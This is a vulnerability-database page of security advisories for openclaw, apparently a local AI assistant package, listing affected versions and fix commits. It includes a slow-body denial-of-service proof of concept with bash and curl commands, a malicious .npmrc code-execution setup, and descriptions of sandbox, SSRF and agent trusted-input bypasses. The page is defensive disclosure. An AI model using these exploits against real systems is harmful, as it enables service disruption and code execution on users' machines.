OpenClaw: Gateway `device.token.rotate` does not terminate active WebSocket sessions after credential rotation ## Summary Gateway `device.token.rotate` does not terminate active WebSocket sessions after credential rotation ## Current Maintainer Triage - Status: open - Normalized severity: low - Assessment: v2026.3.28 rotates device tokens without disconnecting already-authenticated WebSocket sessions, which is a real but post-compromise revocation gap. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `91f7a6b0fd67b703897e6e307762d471ca09333d` — 2026-03-31T09:05:34+09:00 ## Release Process Note - The fix is already present in released version `2026.3.31`. - This draft looks ready for final maintainer disposition or publication, not additional code-fix work. Thanks @zsxsoft for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-z7wa-tw2t-vqas
Aliases: CVE-2026-41388 GHSA-3pm9-5j7m-59vc |
OpenClaw: Tlon Startup Migration Rehydrates Empty-Array Revocations From File Config ## Summary Tlon Startup Migration Rehydrates Empty-Array Revocations From File Config ## Current Maintainer Triage - Status: open - Normalized severity: low - Assessment: v2026.3.28 startup migration still treats empty-array settings as missing and can rehydrate revoked Tlon config from file state after restart. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `a4d72a83f01fedd35964c352e3473c7712a3511b` — 2026-03-31T14:57:03+01:00 ## Release Process Note - The fix is already present in released version `2026.3.31`. - This draft looks ready for final maintainer disposition or publication, not additional code-fix work. Thanks @smaeljaish771 for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-z8mj-pnbe-wqej
Aliases: CVE-2026-41912 GHSA-vr5g-mmx7-h897 |
OpenClaw has Browser SSRF Policy Bypass via Interaction-Triggered Navigation ## Impact Browser SSRF Policy Bypass via Interaction-Triggered Navigation. Browser interactions could trigger navigations that bypassed the normal SSRF navigation checks. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= 2026.4.5` - Patched versions: `2026.4.8` ## Fix The issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`. ## Verification The fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary. ## Credits Thanks @ccreater222 and @KeenSecurityLab for reporting. |
Affected by 60 other vulnerabilities. |
|
VCID-zac2-wjyt-27af
Aliases: CVE-2026-41379 GHSA-3q42-xmxv-9vfr |
OpenClaw: Gateway operator.write Can Reach Admin-Class Talk Voice Config Persistence via chat.send ## Summary Gateway operator.write Can Reach Admin-Class Talk Voice Config Persistence via chat.send ## Current Maintainer Triage - Status: narrow - Normalized severity: medium - Assessment: Real shipped operator.write to admin-class Talk Voice config persistence bug, but it is the same narrow authenticated persistence class and should be normalized below high. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.24` - Patched versions: `>= 2026.3.28` - First stable tag containing the fix: `v2026.3.28` ## Fix Commit(s) - `e34694733fc64931ed4a543c73d84ad3435d5df1` — 2026-03-25T19:55:26Z ## Release Process Note - The fix is already present in released version `2026.3.28`. - This draft looks ready for final maintainer disposition or publication, not additional code-fix work. Thanks @zpbrent for reporting. |
Affected by 150 other vulnerabilities. |
|
VCID-zb5t-hhkm-kfeh
Aliases: CVE-2026-41369 GHSA-cg7q-fg22-4g98 |
OpenClaw: Host exec environment sanitization misses package, registry, Docker, compiler, and TLS override variables ## Summary Host exec environment sanitization misses package, registry, Docker, compiler, and TLS override variables ## Current Maintainer Triage - Normalized severity: medium - Assessment: v2026.3.28 also misses the broader package, registry, compiler, Docker, and TLS env family in the shipped host-env policy, and the unreleased main fix means this is a real medium-severity open issue. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `eb8de6715f02949c21c4e895fffc8a6dcb00975c` — 2026-03-31T19:37:43+09:00 OpenClaw thanks @tdjackey for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-zf3q-78js-k7ce
Aliases: GHSA-jccr-rrw2-vc8h |
OpenClaw safeBins jq `$ENV` filter bypass allows environment variable disclosure ## Summary The jq safe-bin policy blocked explicit `env` usage but still allowed jq programs that accessed environment data through `$ENV`. ## Impact An operator-approved safe-bin jq command could disclose environment variables that the safe-bin policy was supposed to keep out of scope. ## Affected Component `src/infra/exec-safe-bin-semantics.ts` ## Fixed Versions - Affected: `<= 2026.3.24` - Patched: `>= 2026.3.28` - Latest stable `2026.3.28` contains the fix. ## Fix Fixed by commit `78e2f3d66d` (`Exec: tighten jq safe-bin env checks`). Thanks @nicky-cc of Tencent zhuque Lab ([https://github.com/Tencent/AI-Infra-Guard](https://github.com/Tencent/AI-Infra-Guard)) for reporting. |
Affected by 150 other vulnerabilities. |
|
VCID-zg68-u5b5-vkft
Aliases: CVE-2026-43534 GHSA-7g8c-cfr3-vqqr |
OpenClaw: Agent hook events could enqueue trusted system events from unsanitized external input ## Summary Agent hook events could enqueue trusted system events from unsanitized external input. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `< 2026.4.10` - Patched versions: `>= 2026.4.10` ## Impact Agent hook dispatch could turn externally supplied hook metadata into trusted system events, allowing untrusted input to enter the agent as higher-trust context. ## Technical Details The fix sanitizes hook names and marks agent hook system events as untrusted before enqueueing them. ## Fix The issue was fixed in #64372. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `e3a845bde5b54f4f1e742d0a51ba9860f9619b29` - PR: #64372 ## Release Process Note Users should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue. |
Affected by 42 other vulnerabilities. |
|
VCID-zkum-rn42-yyfs
Aliases: CVE-2026-41381 GHSA-cqgw-44wg-44rf |
OpenClaw: Discord voice manager bypasses channel-level member access allowlist ## Summary Discord voice manager bypasses channel-level member access allowlist ## Current Maintainer Triage - Status: open - Normalized severity: medium - Assessment: v2026.3.28 still accepts Discord voice ingress before channel allowlist authorization, and main-only gating means this remains a real shipped access-control bug. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `dba96e7507e0900f120e5e28e57755d69bf78759` — 2026-03-31T21:29:13+09:00 ## Release Process Note - The fix is already present in released version `2026.3.31`. - This draft looks ready for final maintainer disposition or publication, not additional code-fix work. Thanks @zsxsoft for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-zpte-tgt5-wqcm
Aliases: CVE-2026-42439 GHSA-rj2p-j66c-mgqh |
OpenClaw: Browser tabs action select and close routes bypassed SSRF policy ## Summary Browser tabs action select and close routes bypassed SSRF policy. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `< 2026.4.10` - Patched versions: `>= 2026.4.10` ## Impact The browser `/tabs/action` select and close branches could operate on targets without enforcing configured browser SSRF policy, weakening tab-level navigation protections. ## Technical Details The fix enforces browser SSRF policy in the select and close tab-action branches. ## Fix The issue was fixed in #63332. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `48c0347921b7e9438af0312968fc360ca88023f3` - PR: #63332 ## Release Process Note Users should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @tdjackey for reporting this issue. |
Affected by 42 other vulnerabilities. |
|
VCID-zu4s-jnn3-1kd8
Aliases: CVE-2026-43584 GHSA-vfp4-8x56-j7c5 |
OpenClaw: Exec environment denylist missed high-risk interpreter startup variables ## Summary Exec environment denylist missed high-risk interpreter startup variables. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `< 2026.4.10` - Patched versions: `>= 2026.4.10` ## Impact The exec environment policy missed interpreter startup variables such as `VIMINIT`, `EXINIT`, `LUA_INIT`, and `HOSTALIASES`, allowing operator-supplied environment overrides to influence downstream execution or network behavior. ## Technical Details The fix expands the host environment security policy denylist to cover these and related high-risk environment variables, with regression coverage. ## Fix The issue was fixed in #63277. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `2d126fc62343a7b6895351f96e4e1474bc358140` - PR: #63277 ## Release Process Note Users should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @feiyang666 of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting this issue. |
Affected by 42 other vulnerabilities. |
|
VCID-zunq-wnnf-k3fw
Aliases: CVE-2026-42422 GHSA-whf9-3hcx-gq54 |
## Impact OpenClaw `device.token.rotate` mints tokens for unapproved roles, bypassing device role-upgrade pairing. Device token rotation could mint or preserve roles/scopes that had not gone through the intended pairing approval. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= v2026.04.01` - Patched versions: `2026.4.8` ## Fix The issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`. ## Verification The fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary. ## Credits Thanks @nicky-cc of Tencent zhuque Lab ([https://github.com/Tencent/AI-Infra-Guard](https://github.com/Tencent/AI-Infra-Guard)) for reporting. |
Affected by 60 other vulnerabilities. |

| Vulnerability | Summary | Aliases |
|---|---|---|
| VCID-26sv-grsd-abcw | Duplicate Advisory: OpenClaw's message tool media parameter bypasses tool policy filesystem isolation ### Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-v8wv-jg3q-qwpq. This link is maintained to preserve external references. ### Original Description OpenClaw before 2026.3.24 contains a sandbox bypass vulnerability in the message tool that allows attackers to read arbitrary local files by using mediaUrl and fileUrl alias parameters that bypass localRoots validation. Remote attackers can exploit this by routing file requests through unvalidated alias parameters to access files outside the intended sandbox directory. |
GHSA-3gr8-2752-h46q
|
| VCID-384t-z1h8-pfft | OpenClaw: `browser.request` still allows `POST /reset-profile` through the `operator.write` surface > Fixed in OpenClaw 2026.3.24, the current shipping release. # Title `browser.request` still allows `POST /reset-profile` through the `operator.write` surface in OpenClaw `v2026.3.22` after `GHSA-vmhq-cqm9-6p7q` ## Severity Assessment High CWE: - `CWE-863: Incorrect Authorization` Proposed CVSS v3.1: - `8.1` (`CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H`) An authenticated caller who only has access to the scoped Gateway method `browser.request` on the `operator.write` surface can still reach a destructive persistent-profile management route. Likely related advisory family: - `GHSA-vmhq-cqm9-6p7q` This should be treated as a later-version residual or incomplete fix. The earlier fix blocked `POST /profiles/create` and profile deletion, but the latest released `v2026.3.22` code still omits `POST /reset-profile` from the same mutation gate. ## Impact A caller with `operator.write` access to `browser.request` can still trigger persistent profile reset via `POST /reset-profile`. This crosses the intended privilege boundary for browser profile management because the release already attempts to block adjacent persistent profile mutations on this same surface. In practice, the allowed route reaches destructive behavior that can: - stop the running browser for that profile - close the Playwright browser connection for that profile - move the profile's local `userDataDir` to Trash when it exists This is a real integrity and availability impact on persistent browser state, not a route-classification mismatch with no side effects. 
## Affected Component Product: - `openclaw` Tested latest released version: - release tag: `v2026.3.22` - release tag target commit (peeled tag): `e7d11f6c33e223a0dd8a21cfe01076bd76cef87a` Published artifact for that release: - package: `openclaw-2026.3.22.tgz` - package build-info commit: `4dcc39c25c6cc63fedfd004f52d173716576fcf0` - package build-info timestamp: `2026-03-23T10:56:05.946Z` Exact vulnerable paths on the shipped tag: - `src/gateway/method-scopes.ts:114` - `browser.request` is placed on the `operator.write` surface - `src/gateway/server-methods/browser.ts:155-165` - requests are only denied when `isPersistentBrowserProfileMutation(method, path)` returns true - `src/browser/request-policy.ts:19-25` - the mutation classifier recognizes `POST /profiles/create` and `DELETE /profiles/:name`, but not `POST /reset-profile` - `src/browser/routes/basic.ts:161-170` - the browser server exposes `POST /reset-profile` - `src/browser/server-context.reset.ts:37-63` - `resetProfile()` stops the browser, closes the connection, and moves the local profile directory to Trash when present - `src/node-host/invoke-browser.ts:240-243` - the same route-classification helper is reused in the browser proxy path when profile restrictions are active Relevant regression coverage gap on the shipped tag: - `src/gateway/server-methods/browser.profile-from-body.test.ts:104-140` - tests only block `POST /profiles/create` and `DELETE /profiles/:name` - there is no equivalent deny case for `POST /reset-profile` Published artifact evidence for the exact released package: - `openclaw-2026.3.22.tgz::package/dist/build-info.json` - `openclaw-2026.3.22.tgz::package/dist/gateway-cli-Cxz4pSoJ.js:11469-11525` - `openclaw-2026.3.22.tgz::package/dist/gateway-cli-Cxz4pSoJ.js:11484-11485` - `openclaw-2026.3.22.tgz::package/dist/request-policy-nIRryZwZ.js:9-12` - `openclaw-2026.3.22.tgz::package/dist/routes-CdaHRCET.js:6874-6889` Important release note: - the published package build-info commit 
differs from the release tag target commit - for this issue, the relevant authorization and route behavior was cross-checked in both the shipped tag source and the published package bundle, and it matches semantically on the vulnerable path ## Technical Reproduction A direct control/exploit pair can be reproduced against the latest released version. Preconditions: - use `openclaw@2026.3.22` - authenticate as a caller that has access to the scoped Gateway method `browser.request` - keep that caller on `operator.write`, not `operator.admin` - ensure the target local browser profile exists Reproduction steps: 1. Call `browser.request` with: - `method: "POST"` - `path: "/profiles/create"` - `body: { "name": "poc-profile" }` 2. Observe the control case is rejected with: - `browser.request cannot create or delete persistent browser profiles` 3. Call `browser.request` again with: - `method: "POST"` - `path: "/reset-profile"` - `body: { "profile": "poc-profile", "name": "poc-profile" }` 4. Observe that the exploit case is not rejected by the same handler. 5. Observe that the request is forwarded to the browser route/dispatcher, rather than being denied by the mutation classifier. 6. Observe that the reset route succeeds and applies profile reset behavior. 
Why this happens in the released code: - the release tries to gate persistent profile mutation using `isPersistentBrowserProfileMutation(...)` - that helper does not classify `POST /reset-profile` as a protected mutation - the exposed browser server route still maps `/reset-profile` to `profileCtx.resetProfile()` - `resetProfile()` performs state-changing behavior on the selected local profile ## Demonstrated Impact The shipped release shows the following behavior difference: Control case: - `POST /profiles/create` - rejected before the request is dispatched to the browser control path Exploit case: - `POST /reset-profile` - not classified as a blocked mutation - remains reachable through the `browser.request` surface - reaches `resetProfile()`, which performs destructive profile-management operations The reached route has concrete side effects: - stops the running browser if active - closes the Playwright browser connection - moves the profile's local `userDataDir` to Trash if it exists This is therefore a concrete authorization and policy gap on a real destructive profile-management route. It is not a complaint about the existence of `browser.request` by itself. 
## Environment Environment used for validation: - product: `openclaw` - latest released version: `2026.3.22` - release tag: `v2026.3.22` - release tag target commit (peeled tag): `e7d11f6c33e223a0dd8a21cfe01076bd76cef87a` - published package: `openclaw-2026.3.22.tgz` - published package build-info commit: `4dcc39c25c6cc63fedfd004f52d173716576fcf0` Explicit trust-model statement: - this report does **not** rely on adversarial or mutually untrusted operators sharing one gateway host or config Scope check: - this is **not** a complaint about the existence of the explicit `browser.request` surface by itself - this is **not** a prompt-injection-only report - this is **not** a multi-tenant shared-gateway claim - this is **not** an attack on the unscoped HTTP compatibility endpoints - this is a concrete missed route inside an intended privilege gate on a real scoped Gateway method - the control case proves the policy is intended to exist on this surface, and the exploit case proves `POST /reset-profile` remains outside that gate in the shipped release ## Remediation Advice Recommended fix: 1. Extend the persistent-profile mutation classifier to include `POST /reset-profile`. 2. Reuse the same centralized route classification everywhere the release currently relies on `isPersistentBrowserProfileMutation(...)`, including: - `src/gateway/server-methods/browser.ts` - `src/node-host/invoke-browser.ts` 3. Add regression coverage with both: - a deny control for `POST /reset-profile` on the lower-privilege `browser.request` surface - an allow control for non-mutating browser profile reads 4. Review nearby profile-management routes for any other state-changing endpoints that are still omitted from the mutation classifier. 5. Treat `GHSA-vmhq-cqm9-6p7q` as the prior family and close the remaining residual route in the same policy surface. |
CVE-2026-35653
GHSA-xp9r-prpg-373r |
| VCID-9jjv-aa8k-rke1 | OpenClaw's message tool media parameter bypasses tool policy filesystem isolation ## Summary The message tool accepted `mediaUrl` and `fileUrl` aliases without applying the same sandbox localRoots validation as the canonical media path handling. ## Impact A caller constrained to sandbox media roots could read arbitrary local files by routing them through the alias parameters. ## Affected Component `src/infra/outbound/message-action-params.ts, src/infra/outbound/message-action-runner.ts` ## Fixed Versions - Affected: `< 2026.3.24` - Patched: `>= 2026.3.24` - Latest stable `2026.3.28` contains the fix. ## Fix Fixed by commit `1d7cb6fc03` (`fix: close sandbox media root bypass for mediaUrl/fileUrl aliases`). OpenClaw thanks @AntAISecurityLab for reporting. |
CVE-2026-33581
GHSA-v8wv-jg3q-qwpq |
| VCID-9pj9-7b12-jbea | OpenClaw has incomplete Fix for CVE-2026-32011: Feishu Webhook Pre-Auth Body Parsing DoS (Slow-Body / Slowloris Variant) > Fixed in OpenClaw 2026.3.24, the current shipping release. # Advisory Details **Title**: Incomplete Fix for CVE-2026-32011: Feishu Webhook Pre-Auth Body Parsing DoS (Slow-Body / Slowloris Variant) **Description**: ### Summary The patch for CVE-2026-32011 tightened pre-auth body parsing limits (from 1MB/30s to 64KB/5s) across several webhook handlers. However, the **Feishu extension's webhook handler** was not included in the patch and still accepts request bodies with the old permissive limits (1MB body, 30-second timeout) **before** verifying the webhook signature. An unauthenticated attacker can exhaust server connection resources by sending concurrent slow HTTP POST requests to the Feishu webhook endpoint. ### Details In `extensions/feishu/src/monitor.ts`, the webhook HTTP handler uses `installRequestBodyLimitGuard` with permissive limits at lines 276-278: ```typescript const FEISHU_WEBHOOK_MAX_BODY_BYTES = 1024 * 1024; // 1MB (line 26) const FEISHU_WEBHOOK_BODY_TIMEOUT_MS = 30_000; // 30s (line 27) // ... in monitorWebhook(), line 276-278: const guard = installRequestBodyLimitGuard(req, res, { maxBytes: FEISHU_WEBHOOK_MAX_BODY_BYTES, // 1MB timeoutMs: FEISHU_WEBHOOK_BODY_TIMEOUT_MS, // 30s responseFormat: "text", }); ``` The body guard is installed at line 276 **before** the request reaches the Lark SDK's `adaptDefault` webhook handler (line 284), which performs signature verification. This means: 1. Any unauthenticated HTTP POST is accepted 2. The server waits up to 30 seconds for the body to arrive 3. Each connection can buffer up to 1MB 4. Authentication only happens after the body is fully read The patched handlers (Mattermost, MSTeams, Google Chat, etc.) 
now use tight pre-auth limits: ```typescript const PREAUTH_MAX_BODY_BYTES = 64 * 1024; // 64KB const PREAUTH_BODY_TIMEOUT_MS = 5_000; // 5s ``` The Feishu extension was missed because it resides in `extensions/feishu/` (a plugin workspace) rather than in the core `src/` directory. **Attack chain:** ``` [Attacker sends slow HTTP POST to /feishu/events] → Rate limit check: passes (under 120 req/min) → Content-Type check: application/json, passes → installRequestBodyLimitGuard(1MB, 30s): installed → Body trickles at 1 byte/sec for 30 seconds → × 50 concurrent connections = connection exhaustion → Legitimate Feishu webhook deliveries blocked ``` ### PoC **Prerequisites:** Docker installed. **Step 1:** Create a minimal test server reproducing the vulnerable body parsing: ```bash cat > /tmp/feishu_webhook_server.js << 'EOF' const http = require("http"); const VULN_TIMEOUT = 30_000; // Vulnerable: 30s (same as Feishu handler) const PATCH_TIMEOUT = 5_000; // Patched: 5s (what it should be) function bodyGuard(req, res, timeoutMs) { let done = false; const timer = setTimeout(() => { if (!done) { done = true; res.statusCode = 408; res.end("Request body timeout"); req.destroy(); } }, timeoutMs); req.on("end", () => { done = true; clearTimeout(timer); }); req.on("close", () => { done = true; clearTimeout(timer); }); } http.createServer((req, res) => { if (req.url === "/healthz") { res.end("OK"); return; } if (req.method !== "POST") { res.writeHead(405); res.end(); return; } const timeout = req.url === "/feishu/events" ? 
VULN_TIMEOUT : PATCH_TIMEOUT; console.log(`[${req.url}] +conn`); bodyGuard(req, res, timeout); res.on("finish", () => console.log(`[${req.url}] -conn`)); }).listen(3000, () => console.log("Listening on :3000")); EOF node /tmp/feishu_webhook_server.js & sleep 1 ``` **Step 2:** Verify the vulnerability — slow body holds connection for the full timeout: ```bash # Vulnerable endpoint: connection stays open for ~10 seconds (max 30s) time (echo -n '{"t":"'; sleep 10; echo '"}') | \ curl -s -o /dev/null -w "status: %{http_code}\n" \ -X POST http://localhost:3000/feishu/events \ -H "Content-Type: application/json" \ -H "Content-Length: 65536" \ --data-binary @- --max-time 35 # Patched endpoint: connection terminated after ~5s time (echo -n '{"t":"'; sleep 10; echo '"}') | \ curl -s -o /dev/null -w "status: %{http_code}\n" \ -X POST http://localhost:3000/patched/events \ -H "Content-Type: application/json" \ -H "Content-Length: 65536" \ --data-binary @- --max-time 35 ``` **Step 3:** Batch exploit — 10 concurrent slow connections: ```bash for i in $(seq 1 10); do (echo -n 'A'; sleep 15) | \ curl -s -o /dev/null -X POST http://localhost:3000/feishu/events \ -H "Content-Type: application/json" \ -H "Content-Length: 65536" \ --data-binary @- --max-time 35 & done wait ``` ### Log of Evidence **Exploit result (vulnerable /feishu/events):** ``` === Feishu Webhook Pre-Auth Slow-Body DoS === Target: localhost:3000/feishu/events Concurrent connections: 10 [conn-0] held open for 15.0s (15B sent) [SUCCESS] [conn-1] held open for 15.0s (15B sent) [SUCCESS] [conn-2] held open for 15.0s (15B sent) [SUCCESS] [conn-3] held open for 15.0s (15B sent) [SUCCESS] [conn-4] held open for 15.0s (15B sent) [SUCCESS] [conn-5] held open for 15.0s (15B sent) [SUCCESS] [conn-6] held open for 15.0s (15B sent) [SUCCESS] [conn-7] held open for 15.0s (15B sent) [SUCCESS] [conn-8] held open for 15.0s (15B sent) [SUCCESS] [conn-9] held open for 15.0s (15B sent) [SUCCESS] === Results === Connections held open 
(SUCCESS): 10/10 [SUCCESS] Pre-auth slow-body DoS confirmed! ``` **Control result (patched /patched/events with 5s timeout):** ``` === CONTROL: Patched Webhook Body Limits (64KB/5s) === Target: localhost:3000/patched/events [conn-0] RESET after 8.0s (8B) [conn-1] RESET after 8.0s (8B) ... [conn-9] RESET after 8.0s (8B) Avg connection hold time: 8.0s (5s timeout + stagger delay) ``` **Server-side Docker logs confirming the discrepancy:** ``` [feishu-vulnerable] +conn (active: 1) [feishu-vulnerable] +conn (active: 10) ← No disconnections during 15s attack [patched-control] +conn (active: 20) [patched-control] -conn after 5.0s (active: 19) ← ALL terminated at 5s [patched-control] -conn after 5.0s (active: 10) ``` ### Impact An unauthenticated attacker can cause a **Denial of Service** against any OpenClaw instance running the Feishu channel in webhook mode. The Feishu webhook endpoint must be publicly accessible for Feishu to deliver webhooks, so the attacker can directly target it. With ~50 concurrent slow HTTP connections (each trickling 1 byte/second), the attacker can: - Exhaust the server's connection handling capacity for 30 seconds per wave - Block legitimate Feishu webhook deliveries (messages not reaching the bot) - Consume up to 50MB of memory (50 × 1MB buffer) per attack wave The attack is trivial — it only requires sending slow HTTP POST requests. No valid Feishu webhook signature or any other credentials are needed. 
### Affected products - **Ecosystem**: npm - **Package name**: openclaw - **Affected versions**: <= 2026.2.22 - **Patched versions**: None ### Severity - **Severity**: Medium - **Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L ### Weaknesses - **CWE**: CWE-400: Uncontrolled Resource Consumption ### Occurrences | Permalink | Description | | :--- | :--- | | [https://github.com/openclaw/openclaw/blob/main/extensions/feishu/src/monitor.ts#L26-L27](https://github.com/openclaw/openclaw/blob/main/extensions/feishu/src/monitor.ts#L26-L27) | Permissive body limit constants: `FEISHU_WEBHOOK_MAX_BODY_BYTES = 1024 * 1024` (1MB) and `FEISHU_WEBHOOK_BODY_TIMEOUT_MS = 30_000` (30s) — should be 64KB/5s to match the CVE-2026-32011 patch. | | [https://github.com/openclaw/openclaw/blob/main/extensions/feishu/src/monitor.ts#L276-L280](https://github.com/openclaw/openclaw/blob/main/extensions/feishu/src/monitor.ts#L276-L280) | `installRequestBodyLimitGuard` call in `monitorWebhook()` using the permissive constants — this guard runs before authentication (the Lark SDK handler at line 284). | |
CVE-2026-35665
GHSA-w6m8-cqvj-pg5v |
| VCID-brfj-4shr-qkgc | OpenClaw has an Arbitrary Malicious Code Execution Vulnerability > Fixed in OpenClaw 2026.3.24, the current shipping release. ### Summary During the installation phase of OpenClaw local plugins/hooks, the Git executable can be hijacked by a project-level .npmrc file, leading to arbitrary code execution during installation. ### Details Please note that the source code locations mentioned below are based on version openclaw-2026.3.13-1, but the issue has been confirmed to still exist in the current latest version, 2026.3.23. When installing a local plugin directory, local plugin archive, local hook pack directory, or local hook pack archive, OpenClaw first copies the source directory to a temporary `stageDir`, then executes the following in that directory: ``` npm install --omit=dev --silent --ignore-scripts ``` See `src/infra/install-package-dir.ts:176-199`. Since this process does not strip the project root `.npmrc`, and npm reads the project-level `.npmrc` during local project installation, an attacker could use a `.npmrc` file in a malicious plugin or hook directory to override npm’s `git` executable path. By leveraging a Git dependency, the attacker could trigger npm to call this malicious program, thereby executing arbitrary local code during the installation phase. **Affected Paths** - Plugin CLI entry point: `src/cli/plugins-cli.ts:199-255` - Hook CLI entry point: `src/cli/hooks-cli.ts:573-676` - Plugin local directory / archive installation: `src/plugins/install.ts:379-405`, `src/plugins/install.ts:541-565` - Hook local directory / archive installation: `src/hooks/install.ts:380-403`, `src/hooks/install.ts:443-470` - Actual execution of `npm install --ignore-scripts`: `src/infra/install-package-dir.ts:176-199` **Vulnerability Trigger Flow** 1. The user executes one of the following commands: - `openclaw plugins install <path-or-spec>` - `openclaw hooks install <path-or-spec>` 2. 
If the argument is a local directory or local archive, OpenClaw navigates to the local installation path. 3. OpenClaw copies the source directory to a temporary `stageDir`. See `src/infra/install-package-dir.ts:176-177`. 4. If `dependencies` are present in `package.json`, OpenClaw executes the following in `stageDir`: ``` npm install --omit=dev --silent --ignore-scripts ``` See `src/infra/install-package-dir.ts:188-199`. 5. npm reads the project-level `.npmrc` file in this directory. Official documentation: [`.npmrc`](https://docs.npmjs.com/cli/v11/configuring-npm/npmrc/) 6. If `.npmrc` is set to `git=<path to malicious program>` and there is a git dependency in the dependency tree, npm will invoke that `git` program when resolving the dependency. Official documentation: [`npm config git`](https://docs.npmjs.com/cli/v11/using-npm/config/) Git dependency documentation: [`package.json`](https://docs.npmjs.com/cli/v11/configuring-npm/package-json/) 7. Consequently, an attacker can execute arbitrary local programs during the plugin/hook installation phase without waiting for the plugin or hook to be loaded later. **Triggering Commands** - Plugin installation command: ``` openclaw plugins install <path-or-spec> ``` - Hook installation command: ``` openclaw hooks install <path-or-spec> ``` When `<path-or-spec>` is a local directory or local archive, it will be resolved to the path used by the `npm install --omit=dev --silent --ignore-scripts` command mentioned above. 
### PoC Currently, `testpoc/` is a minimal PoC directory used to verify that “when installing local packages, OpenClaw enters the `npm install --ignore-scripts` path.” It is divided into two core sections: testpoc/pkg/ Purpose: Simulates the local package directory installed by `openclaw plugins install ...` or `openclaw hooks install ...` testpoc/repo/ Purpose: Simulates a Git dependency repository within the npm dependency tree Directory Structure testpoc/ ├─ pkg/ │ ├─ .npmrc │ ├─ package.json │ └─ sample-hook/ │ ├─ HOOK.md │ └─ handler.js └─ repo/ ├─ package.json └─ .git/... Function of Each Component testpoc/pkg/.npmrc Current content: `git=calc.exe` Function: Overrides npm’s Git executable configuration. Meaning: When npm encounters a git dependency during installation, it will not call the system git but will attempt to call the program specified here. This is the core trigger point of this PoC. See testpoc/pkg/.npmrc:1 testpoc/pkg/package.json Currently, this is a “mixed-use” manifest that includes both plugin and hook fields: ```json { "name": "probe-host", "version": "1.0.0", "private": true, "openclaw": { "extensions": ["./dist/index.js"], "hooks": ["./sample-hook"] }, "dependencies": { "probe-git-dep": "git+file:///D:/AI Agent Source/OpenClaw/openclaw-2026.3.13-1/.testpoc/repo" } } ``` Its functionality is divided into three layers: openclaw.extensions: Allows it to be validated as a plugin package openclaw.hooks: Enables it to be validated as a hook package The Git URL in dependencies: Forces npm to enter the Git dependency resolution path during installation See testpoc/pkg/package.json:1 testpoc/pkg/sample-hook/HOOK.md Purpose: To meet the minimum metadata requirements for a hook package. This is the key file that allows `openclaw hooks install pkg` to pass the pre-check. 
See testpoc/pkg/sample-hook/HOOK.md:1 testpoc/pkg/sample-hook/handler.js Current content: `export default async function handler() { return { ok: true }; }` Purpose: Meets the requirement that the hook directory must contain a handler entry file. It is not a usage point in itself; its sole purpose is to allow OpenClaw to proceed to the dependency installation phase. See testpoc/pkg/sample-hook/handler.js:1 testpoc/repo/package.json Current content: `{"name":"probe-git-dep","version":"1.0.0"}` Purpose: Serves as the minimum repository content corresponding to a Git dependency. The focus is not on the repository code itself, but on the fact that “it is a Git repository,” allowing npm to perform Git-related operations on it. See testpoc/repo/package.json:1 testpoc/repo/.git/ Purpose: Makes testpoc/repo/ a real Git repository rather than a regular directory. When npm resolves git+file://... while installing dependencies, this is treated as the Git source. How the current PoC works If installing via hooks: `openclaw hooks install testpoc/pkg` The trigger chain is: 1. OpenClaw identifies testpoc/pkg as the local hook package path 2. The package passes pre-validation in openclaw.hooks, HOOK.md, and handler.js 3. OpenClaw proceeds to src/infra/install-package-dir.ts:188-199 4. It executes: `npm install --omit=dev --silent --ignore-scripts` 5. npm reads testpoc/pkg/.npmrc 6. npm processes the git dependency in package.json 7. npm attempts to call the `git=calc.exe` specified in .npmrc ### Impact It is best described as an 